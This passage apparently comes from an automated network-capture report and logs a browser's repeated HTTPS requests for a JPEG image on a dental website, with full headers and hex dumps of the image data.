                                                                                                                                      server: LiteSpeed
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:13:30 UTC899INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 32 00 00 ff e1 03 81 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                      Data Ascii: ExifII*Ducky2http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                      2024-04-24 10:13:31 UTC14994INData Raw: 6f 6e 3e 20 3c 2f 72 64 66 3a 52 44 46 3e 20 3c 2f 78 3a 78 6d 70 6d 65 74 61 3e 20 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 3d 22 72 22 3f 3e ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 08 06 06 06 06 06 08 06 06 08 0c 08 07 08 0c 0e 0a 08 08 0a 0e 10 0d 0d 0e 0d 0d 10 11 0c 0e 0d 0d 0e 0c 11 0f 12 13 14 13 12 0f 18 18 1a 1a 18 18 23 22 22 22 23 27 27 27 27 27 27 27 27 27 27 01 09 08 08 09 0a 09 0b 09 09 0b 0e 0b 0d 0b 0e 11 0e 0e 0e 0e 11 13 0d 0d 0e 0d 0d 13 18 11 0f 0f 0f 0f 11 18 16 17 14 14 14 17 16 1a 1a 18 18 1a 1a 21 21 20 21 21 27 27 27 27 27 27 27 27 27 27 ff c0 00 11 08 03 e8 06 de 03 01 22 00 02 11 01 03 11 01 ff c4 00 c3 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 01 01 01 01 01 01 01 01 00
                                                                                                                                      Data Ascii: on> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>Adobed#"""#''''''''''!! !!''''''''''"
                                                                                                                                      2024-04-24 10:13:31 UTC16384INData Raw: fd 4b a3 fa 1e 06 65 bb a2 3f 27 12 4c 0a 19 a5 82 69 19 10 2e 01 ac 1f 9b 56 ee 7b 88 a5 2e b8 1d 1f a0 7a 4f a7 f4 53 d4 32 5f 36 47 50 c7 71 19 1d 3a 78 cc 9e 64 a0 11 48 22 61 04 02 45 43 e8 7c 2b 9b 97 83 eb 3f 57 75 86 74 e1 8f f4 42 66 36 73 83 1b 9f e4 c4 d7 b4 0f 3a 50 4b dc 0b a9 4f 17 15 d2 6b c6 6e 73 f7 19 b7 88 eb f5 cf 56 e4 60 ce 71 64 eb ad c8 74 04 33 23 0e 38 5e f6 ba ad 1b b6 f9 a1 ed 6b 99 7f c4 bd e7 a3 ba bb 7a df 49 76 49 8f 66 3b 48 8a 06 f8 80 da d0 3c 5e 20 2a 78 1a 5a a1 79 be 83 fa 6b 89 d2 f2 71 19 d4 83 72 73 db 11 7c d1 83 bb 6b dd 23 1a 2f a5 9a ef bd 7d 3f 1f 16 18 70 61 82 26 06 c5 13 7c b8 da 00 a0 6b 7c 2d f8 2e 1b e2 7d ad 47 29 c0 f9 ad 06 8d 6e 8d 3c 29 c1 6d 85 ed 73 46 d3 5b 5f 82 cd 95 08 69 dc 00 14 d1 2c 77 d0
                                                                                                                                      Data Ascii: Ke?'Li.V{.zOS2_6GPq:xdH"aEC|+?WutBf6s:PKOknsV`qdt3#8^kzIvIf;H<^ *xZykqrs|k#/}?pa&|k|-.}G)n<)msF[_i,w
                                                                                                                                      2024-04-24 10:13:31 UTC16384INData Raw: d3 bd 76 2e b7 87 47 90 32 a2 1b 65 67 1f eb 05 d7 ad 0f 6a f9 cf 51 c7 c9 f4 d7 55 6f 53 c3 1f 90 f7 7e 63 46 94 3a 8f 6a f7 98 59 d0 75 2c 46 66 40 6a d7 8a 9e 60 f1 05 5e bf 56 6f 0d 61 d7 56 34 d1 50 d2 a6 1c a0 bc 15 30 42 a4 39 4c 15 55 68 2a 40 aa 81 52 0e 44 5a 0a 90 2a a0 54 c1 41 60 2a 40 aa 81 52 aa 0b 2a 98 2a ba a9 02 82 6a 28 06 a9 14 12 06 ea c0 55 20 ab 01 41 68 29 a8 02 a5 54 0d 08 aa 10 44 a1 34 90 15 49 08 40 14 24 8a a0 65 25 17 48 d6 dc 95 43 b3 f1 83 84 61 e1 cf 75 83 45 ca 0d 28 5b b1 3a 56 4e 4b 43 c8 da d3 cd 75 61 e8 51 b6 9e 63 aa 53 8e f5 66 b5 e7 43 1c ed 01 2a f8 f0 b2 24 b0 61 5e 95 98 fd 3e 17 f9 40 87 cb fc 0d f1 3b db 4d 16 f8 a0 e3 b0 31 bc b8 a6 64 ed f7 b5 f1 79 88 7a 24 ef 23 75 bb 17 4e 0f 4f 46 28 65 3e c5 d9 73 a2
                                                                                                                                      Data Ascii: v.G2egjQUoS~cF:jYu,Ff@j`^VoaV4P0B9LUh*@RDZ*TA`*@R**j(U Ah)TD4I@$e%HCauE([:VNKCuaQcSfC*$a^>@;M1dyz$#uNOF(e>s
                                                                                                                                      2024-04-24 10:13:31 UTC16384INData Raw: dd 3d 2b ac bc 3b 2d 67 94 e3 63 4e 76 b2 ca 73 a5 83 20 1c 39 3f bb 70 71 94 80 45 5a 41 a0 ae b7 0b 8f 99 d7 5c e6 bb 17 1d d5 e0 f9 05 fb c0 47 4e cd ac 4e 8c b4 3e 41 50 d0 ed 2b cd 7a 3c 3e 0e 9b 6f f6 47 8f f7 1f ba eb a7 8f ed af 73 d7 bd 77 8b ea 5c 03 83 9b 8e c2 36 ed ca c3 93 e5 b0 bb e3 22 e3 98 3a 85 f2 7c ac 4e 8b 11 73 71 24 9a 80 9d bb a8 56 8e a1 33 21 8f 64 c3 76 7b 9c 7f 29 9a 06 9d 09 20 9f 72 e4 33 17 22 67 55 e0 8f 82 f5 c9 e8 f1 5b 96 ce 94 cf 2f 3e 09 de 4f 93 0b db 20 0d d4 b9 a7 73 41 5f 54 ea 79 9e 98 c9 87 1f a9 cf 2c 66 6d a7 7c 05 85 c5 84 f8 9d 56 d2 9b 1d 5a d3 f0 9e c2 be 5c 19 14 2c 8a 5c 37 ba 3c b6 9d af 89 e0 79 6e 1c f7 56 b5 f6 2d 78 3d 7e 7e 97 d4 71 fa 8c d8 ed 9d 90 1a 4d 8b 28 df 14 8c 78 da e6 3b 85 c6 85 4b 2e
                                                                                                                                      Data Ascii: =+;-gcNvs 9?pqEZA\GNN>AP+z<>oGsw\6":|Nsq$V3!dv{) r3"gU[/>O sA_Ty,fm|VZ\,\7<ynV-x=~~qM(x;K.
                                                                                                                                      2024-04-24 10:13:31 UTC16384INData Raw: 4c cf f6 db 3f ab 97 96 4f 96 5e 93 d0 3d 53 fc a7 d4 fd 37 28 bb 6b 1d 33 61 94 ff 00 46 5f ca 3f eb 2f bd 7a f7 0c 67 fa 53 aa e3 d2 a5 d8 d2 10 3b 5a 37 8f b1 7e 61 c6 94 c6 03 d9 67 b1 c0 b4 f6 83 50 bf 52 f4 ec e8 bd 45 e9 9c 7c d6 dd b9 78 e0 3c 6b e2 2d d8 f1 ef aa e7 b6 df 0f 3f 8b c9 f4 ff 00 d3 72 be 3b 9d 36 9f eb 97 e3 67 0a 38 84 42 f2 c9 9a ef e1 70 77 b8 d5 68 ea 30 1c 5c fc 9c 67 58 c5 2b d8 47 f5 5c 42 c8 3e 61 da b1 e6 d7 e3 e4 f2 69 e9 b5 9f 75 74 97 a5 7e 9e f4 fe 57 d4 f4 7c 39 6c 6b 18 fb 17 4f 77 62 f1 5f a7 d9 bf 51 e9 d8 01 75 4c 7e 1a 2f 58 25 3c d7 0f 1f e5 c7 a7 0d de ad 35 6f 10 80 23 3d 8a 81 29 53 12 ad 22 df 2d 85 1e 53 7b 15 62 46 f1 52 de da 20 fc eb eb 5f f9 cb d4 3f f1 2c cf f1 de b8 60 ae df ad 8f fe 72 f5 08 e3 fe 65
                                                                                                                                      Data Ascii: L?O^=S7(k3aF_?/zgS;Z7~agPRE|x<k-?r;6g8Bpwh0\gX+G\B>aiut~W|9lkOwb_QuL~/X%<5o#=)S"-S{bFR _?,`re
                                                                                                                                      2024-04-24 10:13:31 UTC16384INData Raw: ae a1 00 11 4a 12 78 57 9a ad c0 06 b9 b6 2d da 08 3c c8 5a e6 2d 61 0f 0c 2e 6b 45 1c 3b 56 3a 3b c1 16 ca 34 82 6a 4d aa 55 96 a5 5f b0 3b 70 20 36 c0 b6 bf 15 26 40 49 6f f1 03 dd aa b1 ad 73 9c da d2 c2 82 8a 7b 5d 56 92 ea 01 6a d3 55 72 84 71 b7 3d ec 70 a0 70 f1 2a 59 0d 03 45 2a 5a eb 1e c5 ac 31 c1 a0 ba ee 37 04 a4 22 6b 0d 9b e2 3c 7b d5 94 12 08 da c6 f8 81 27 e0 bc ff 00 5e d9 f4 d2 bb 79 73 83 68 1a 35 ba ef 39 cd 8e 85 c0 72 da b8 5d 5d 9f 95 24 a4 50 6d 36 d3 45 d3 c7 d6 26 dd 1c 2f 46 75 d8 7c d9 7a 7c a4 99 1a ea b0 3b 88 e4 bd ec 72 5a b4 ee 5f 9f dd 99 2e 1f 54 76 44 24 b5 cd 7d 47 bd 7d 3b a5 fa 9d d3 61 b2 49 68 4b a8 07 7f 6a ed e6 f0 df 96 67 76 35 db 8e 5e f1 af 2e 65 a8 99 24 0a 6e b0 5e 7f 0f ad b5 ef a6 e1 b4 59 c1 74 22 ea 71
                                                                                                                                      Data Ascii: JxW-<Z-a.kE;V:;4jMU_;p 6&@Ios{]VjUrq=pp*YE*Z17"k<{'^ysh59r]]$Pm6E&/Fu|z|;rZ_.TvD$}G};aIhKjgv5^.e$n^Yt"q
                                                                                                                                      2024-04-24 10:13:31 UTC16384INData Raw: 9c 17 57 37 1d af 34 a5 87 1f e5 5c 69 18 e8 5d 4a 5b 81 50 68 0f b9 76 81 4a d6 fb 56 76 bf c2 2b ec 57 35 e2 9d 8a a2 55 b5 35 aa 8d 89 3d 8a 44 6e b8 d3 54 50 8a 1e 1d a8 a8 87 03 40 e3 a2 95 69 43 5a 73 e5 45 0f 9b 40 a4 d7 03 af b5 32 1e e2 fe e5 11 71 4f 8a 08 00 51 a4 d0 ea 12 16 a8 a7 f2 26 43 da 6a 4a 60 50 eb 7a e8 82 6b a2 87 65 53 22 fa 02 28 45 b8 28 3a 16 6a 2c 4a 6c 79 06 9c 39 23 75 74 06 bd b6 44 8a 68 e6 ea 2d d8 ab 2e 24 dc d9 6b a8 ad 28 aa 96 36 3c f8 7c 27 88 e0 82 90 ea 8e c4 69 71 a6 a9 10 59 a8 b2 05 f4 b2 29 fd a9 93 6a 2a c9 1d c5 36 d0 a0 95 42 75 0a b3 cd 01 dc 38 a0 b0 d6 9d d7 51 b5 7b 54 43 c8 4c 55 c6 8d b0 1a 94 16 44 49 9c 03 7f 09 1f 7a b8 03 4b 2a 23 1b 25 63 8d 6e 68 4f 61 b2 d5 60 ea 68 81 11 cf e2 80 38 81 de a5 b4
                                                                                                                                      Data Ascii: W74\i]J[PhvJVv+W5U5=DnTP@iCZsE@2qOQ&CjJ`PzkeS"(E(:j,Jly9#utDh-.$k(6<|'iqY)j*6Bu8Q{TCLUDIzK*#%cnhOa`h8
                                                                                                                                      2024-04-24 10:13:31 UTC16384INData Raw: 92 01 53 0b 9a ff 00 71 a2 f8 45 7f 91 7b f5 b9 f0 f8 ef a6 75 fb ae 7f ab 8d fc d5 2f b1 15 4b 8a 7a 28 a1 30 54 78 20 f0 bd d1 12 a9 fd c8 aa 55 4a a8 ab e0 90 c5 34 72 0b 6d 70 77 b8 af a6 7e a0 44 33 bd 19 8b 96 d0 09 8f 63 ab df 65 f2 d0 57 d5 d9 4e ab fa 73 23 35 74 71 1f 7b 6f f7 2e 3b 5f 8f 9f c1 b7 6f 95 d6 ff 00 f7 2f 5d 37 9f 6f dc f8 92 68 22 84 84 97 7b 31 6c 65 74 0e a3 c2 ea b7 e5 05 72 23 b3 81 5d 58 cd 58 0f b9 62 f5 58 a1 c3 6c fd ea 02 57 36 67 45 53 47 d3 e0 6a a7 38 db 23 4e aa 0f 6f fb cc 6e ec 3f 61 4f f6 1d 6f 5c 7f ce 7e a2 ff 00 89 e6 7f 8e f5 c0 d4 2e f7 ae 3f e7 4f 51 7f c4 f3 3f c7 7a e0 56 8b 40 aa 48 aa 48 86 8d 12 42 28 29 27 44 22 04 c0 4c 04 c0 40 34 29 86 a4 02 9b 55 12 00 29 80 93 45 54 c0 28 40 02 74 aa 90 6f f3 29 b5
                                                                                                                                      Data Ascii: SqE{u/Kz(0Tx UJ4rmpw~D3ceWNs#5tq{o.;_o/]7oh"{1letr#]XXbXlW6gESGj8#Non?aOo\~.?OQ?zV@HHB()'D"L@4)U)ET(@to)
                                                                                                                                      2024-04-24 10:13:31 UTC16384INData Raw: 75 8d 77 53 b9 73 f2 1e dc a8 9f 03 a9 e7 44 e0 41 a0 ae d2 3e 61 45 d4 8f e9 ce 33 dc 24 93 ce a1 0f 69 6d cd 6d c5 73 24 84 62 be 19 58 d2 08 b3 c8 06 b4 e2 0a d6 b7 f8 25 f5 55 d3 e5 c6 74 98 f0 12 47 85 cc 26 9f 33 8f 1a ae c8 c3 c6 ca 6b 8f 84 cf e1 0d d2 ef 6e ab 91 18 82 3c c7 cf 43 b4 50 b3 fa 35 bd 68 bb b8 ae 8a 41 1b e2 78 32 d4 b9 84 37 96 9b 95 de f3 99 69 3d d5 4a d8 4c 62 26 02 64 de 0c 6d 22 b4 1c 40 77 0b 85 cb eb f8 50 cf 8e 72 1a e6 82 f6 80 f6 fe 2d c4 fd ab b5 34 3e 0d e6 46 b5 cd 24 3d ba 5e b5 ab 7d eb 06 4e 3c 19 22 68 dc 1b 57 36 8c a7 31 c4 f6 a6 97 16 5c a6 d1 e5 fa 6e 34 39 78 b5 92 6a 1c 7a 97 87 70 68 d2 8a 9c ac 9e 99 14 b2 44 1d 53 23 45 1c cb 0d eb 4e 1e 13 24 c8 ce e9 ef 3b 1e 59 ba 3b 50 f3 a1 5c a9 3a 6c 10 4e d6 4b 2b
                                                                                                                                      Data Ascii: uwSsDA>aE3$imms$bX%UtG&3kn<CP5hAx27i=JLb&dm"@wPr-4>F$=^}N<"hW61\n49xjzphDS#EN$;Y;P\:lNK+


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      69192.168.2.164979091.238.164.1764437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:30 UTC668OUTGET /wp-content/uploads/2017/03/desk.jpg HTTP/1.1
                                                                                                                                      Host: dentalhealthstop.co.uk
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                      Referer: https://dentalhealthstop.co.uk/wp-content/themes/dentalhealthstop/style.css
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:13:30 UTC468INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:13:30 GMT
                                                                                                                                      content-type: image/jpeg
                                                                                                                                      last-modified: Fri, 14 Feb 2020 06:32:22 GMT
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 74590
                                                                                                                                      date: Wed, 24 Apr 2024 10:13:30 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:13:30 UTC900INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 32 00 00 ff e1 03 81 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                      Data Ascii: ExifII*Ducky2http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                      2024-04-24 10:13:31 UTC14994INData Raw: 6e 3e 20 3c 2f 72 64 66 3a 52 44 46 3e 20 3c 2f 78 3a 78 6d 70 6d 65 74 61 3e 20 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 3d 22 72 22 3f 3e ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 08 06 06 06 06 06 08 06 06 08 0c 08 07 08 0c 0e 0a 08 08 0a 0e 10 0d 0d 0e 0d 0d 10 11 0c 0e 0d 0d 0e 0c 11 0f 12 13 14 13 12 0f 18 18 1a 1a 18 18 23 22 22 22 23 27 27 27 27 27 27 27 27 27 27 01 09 08 08 09 0a 09 0b 09 09 0b 0e 0b 0d 0b 0e 11 0e 0e 0e 0e 11 13 0d 0d 0e 0d 0d 13 18 11 0f 0f 0f 0f 11 18 16 17 14 14 14 17 16 1a 1a 18 18 1a 1a 21 21 20 21 21 27 27 27 27 27 27 27 27 27 27 ff c0 00 11 08 03 e8 06 de 03 01 22 00 02 11 01 03 11 01 ff c4 00 b1 00 01 01 01 00 02 03 01 00 00 00 00 00 00 00 00 00 00 01 02 03 07 04 05 06 08 01 01 01 01 01 01 01 01 00 00
                                                                                                                                      Data Ascii: n> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>Adobed#"""#''''''''''!! !!''''''''''"
                                                                                                                                      2024-04-24 10:13:31 UTC16384INData Raw: 01 43 cd da b6 ac ed eb 3e d6 dd b7 db f8 99 17 9e 9d 91 8c 57 bd 39 be c8 c7 b5 9c 58 58 59 5b 8e 5d 9c 1c 2b 4e f6 4d f9 28 5a b7 1e 2d fe 64 bb 59 df 1d 25 d2 b8 9d 2f 83 f0 a3 4b b9 f7 d2 79 99 49 7b cf 8f c3 b7 fa 91 fa 78 84 79 3d 37 d3 b8 5d 35 b7 47 07 13 db b9 2a 4b 2b 25 aa 4a ed ce ff 00 08 af aa bb 3c cf 72 40 41 40 00 0a 40 05 00 00 00 10 00 00 50 00 00 00 02 90 01 40 00 08 e3 19 56 13 55 84 bd 99 2f 07 a3 28 03 f3 3e ed 83 2d b7 74 cd db e4 a8 f1 af dc b4 97 84 64 e9 f4 1e 19 f6 5f 33 b0 3f 07 d5 77 af c5 52 19 d6 ad e4 27 d9 cd 4f 87 3f a6 27 c6 9a 1d f3 f2 d6 e7 c4 e8 ec 0f d4 95 e8 7a ae 3f d2 7d 61 f1 1f 2a ae f3 f4 a2 87 fc 2c 9b d1 f5 f2 cb f3 9f 6e 65 40 00 40 a4 28 00 00 00 00 14 80 01 41 0a 00 00 14 00 04 00 01 40 00 00 00 02 90 04
                                                                                                                                      Data Ascii: C>W9XXY[]+NM(Z-dY%/KyI{xy=7]5G*K+%J<r@A@@P@VU/(>-td_3?wR'O?'z?}a*,ne@@(A@
                                                                                                                                      2024-04-24 10:13:31 UTC16384INData Raw: 03 cc 10 0c dc bd 66 cd cb 76 6f 5d 85 bb b7 5f 2d ab 73 9c 63 39 be e8 c6 4d 36 75 ef cc 6d e3 a9 76 8c ac 78 60 e5 cb 1b 6c cb b6 f9 25 65 28 dc f8 90 d2 e4 27 72 9c dd aa 4b 5e 0c eb 19 df bf 72 f7 e2 67 76 72 c8 4d 49 5e 94 9c a7 cc 9d 54 b9 9b a9 70 3f 4a 15 3a 34 e9 5a 6b 47 c0 f4 fd 33 bd c7 a8 36 5c 6d ca ab e3 c9 7c 2c b8 af ab 7e 1a 4f f8 b4 92 f3 3d b9 07 44 f5 be d5 91 b5 75 0e 4d 8b f7 2e 5f b7 77 ef f1 2f 5d 93 9c 9d 9b 8e a9 56 55 d6 2e b1 7e 47 ce c6 52 84 a3 38 49 c6 71 6a 51 92 d1 a6 b5 4d 1d d3 f3 1b 63 fe ab b1 3c eb 31 e6 cb da eb 7a 34 e3 2b 12 fe 74 3f 77 49 af 49 d2 cc a3 f4 27 4c ef 70 ea 0d 93 17 73 aa f8 d2 5f 0f 2e 2b ea df b7 a4 ff 00 8b 49 2f 33 c3 eb 6d 8b fa f6 c1 7e d5 98 f3 66 62 57 2b 12 9c 5c a0 be f2 df ef c3 e9 48 f8
                                                                                                                                      Data Ascii: fvo]_-sc9M6umvx`l%e('rK^rgvrMI^Tp?J:4ZkG36\m|,~O=DuM._w/]VU.~GR8IqjQMc<1z4+t?wII'Lps_.+I/3m~fbW+\H
                                                                                                                                      2024-04-24 10:13:31 UTC16384INData Raw: 46 15 6f 5b 98 ef 4b 73 f3 87 b8 fd 02 8f b5 00 10 00 00 50 42 80 00 00 00 01 40 00 00 00 00 01 14 00 14 00 04 00 01 40 00 40 00 14 00 a1 02 14 80 50 42 80 00 00 00 00 00 00 00 00 00 01 40 00 40 00 00 00 50 a4 28 40 00 00 00 00 00 00 02 00 00 00 00 00 00 80 00 00 08 50 04 00 00 21 48 00 00 00 02 05 00 00 08 52 00 00 80 02 ed 01 76 81 f9 b2 7e fc bc d9 13 d4 b3 f7 e5 e6 c8 07 3d b9 1e 42 75 47 85 07 43 c9 84 82 57 21 19 43 22 32 01 00 00 00 10 a4 00 42 90 08 00 65 10 85 20 00 00 11 68 72 c5 9c 4c b1 65 58 e6 04 4c d0 50 56 86 5c d2 38 67 78 0f 22 59 3c 8b 89 e1 df cd 9b d1 33 86 e5 ea 9c 0d d4 98 09 4e 53 75 6c c8 05 00 00 00 54 8d 28 b6 06 52 39 23 06 ce 48 db 39 63 6c 99 1c 71 b6 73 46 14 36 a2 6d 22 2b 2a 26 b9 4d 28 9b 51 03 c3 bd 6c f0 e4 a8 e8 7b 6b
                                                                                                                                      Data Ascii: Fo[KsPB@@@PB@@P(@P!HRv~=BuGCW!C"2Be hrLeXLPV\8gx"Y<3NSulT(R9#H9clqsF6m"+*&M(Ql{k
                                                                                                                                      2024-04-24 10:13:31 UTC9544INData Raw: de 8b b8 e7 a2 ae a6 25 ab ab e1 d8 51 c0 d7 76 a7 1b 8d 4e 66 bd 1f 49 89 2a f0 03 89 a3 0d 78 9c 8d 53 89 86 97 70 1c 6e bc 16 a4 6b b3 8f 79 b7 55 d9 a1 9a 77 af 10 30 e3 4a 6b 43 2d 2d 2b c4 e4 a2 6a 94 31 4d 74 03 0e 89 d2 9e 80 f4 ec f2 34 eb df ea 33 47 c6 4e 80 47 45 ef 31 55 5e 3f 41 1f 81 6b 4e 20 2a df e7 25 5d 47 05 57 2f 42 0a 54 f4 f6 01 6a a9 af d0 28 96 b5 d4 57 d2 1a 6f 50 2a ef 7e b3 4b 5d 7f 29 98 d1 2d 57 a5 97 82 ad 75 20 aa 8d f7 78 b2 f3 3f ab a9 95 af 1a bf 12 aa f6 70 ef 60 5a fa cd 68 d1 8d 3b 68 6b 8b ad 68 05 0a 8f 8a f5 84 e9 fa 59 5f 7f 2d 58 05 4f 04 38 6a 9d 6b d8 4a ba 52 9a bf 59 2a f8 2d 1b 02 eb e4 4a 3e 29 8f 0a d5 f6 b0 96 9d c0 4a ea 25 57 c3 d4 54 bb bb 4b c3 cf b8 09 14 fb b5 65 d6 9f 98 8b 9b bb 57 d8 4d 78 be 00
                                                                                                                                      Data Ascii: %QvNfI*xSpnkyUw0JkC--+j1Mt43GNGE1U^?AkN *%]GW/BTj(WoP*~K])-Wu x?p`Zh;hkhY_-XO8jkJRY*-J>)J%WTKeWMx


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      70192.168.2.164979691.238.164.1764437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:32 UTC381OUTGET /wp-content/uploads/2017/03/desk.jpg HTTP/1.1
                                                                                                                                      Host: dentalhealthstop.co.uk
                                                                                                                                      Connection: keep-alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:13:32 UTC468INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:13:32 GMT
                                                                                                                                      content-type: image/jpeg
                                                                                                                                      last-modified: Fri, 14 Feb 2020 06:32:22 GMT
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 74590
                                                                                                                                      date: Wed, 24 Apr 2024 10:13:32 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:13:32 UTC900INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 32 00 00 ff e1 03 81 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                      Data Ascii: ExifII*Ducky2http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
